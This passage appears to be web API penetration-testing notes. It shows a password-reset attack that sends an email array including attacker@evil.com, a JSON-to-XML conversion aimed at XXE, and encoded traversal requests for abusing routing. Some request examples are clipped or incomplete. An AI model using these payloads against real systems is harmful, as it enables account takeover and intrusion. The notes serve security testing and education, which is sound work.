Password reset

From: https://hackerone.com/reports/322985
The attacker was able to send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address.

POST https://hq.breadcrumb.com/api/v1/password_reset HTTP/1.1
with body like {"email_address":["admin@breadcrumb.com","attacker@evil.com"]}


When the API accept JSON type format payload, then you can try to send the same payload but as a XML file. You can download the Burp extension named "Content Type Converter".

This extension helps you to modify the JSON request to XML, XML request to JSON and normal form request to JSON in order to play with request and responses. https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html

PUT /api/search HTTP/1.1
Host: test.com
Content-Type: application/json;charset=UTF-8

    "message": "xxx"
PUT /api/message HTTP/1.1
Host: test.com
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

If the request is accepted by the API, then you can try to attack with an XXE payload.

Exploit application routing

@samwcyo explains how to exploit some mis-configuration on web routing. That's mean a server may internally call an other resource based on the user URL. The rewriting can be modify using techniques such as Directory traversal (../) or add Control characters (%23 (#), %3f (?), %26 (&), %2e (.), %2f (/), %40 (@)) with double or triple encoding in the URL.

He shows some real examples where he can raise an exception on the internal application using some encoding on control characters:

GET /files/lol.png%23 HTTP/1.1
GET /files/..%2f%23 HTTP/1.1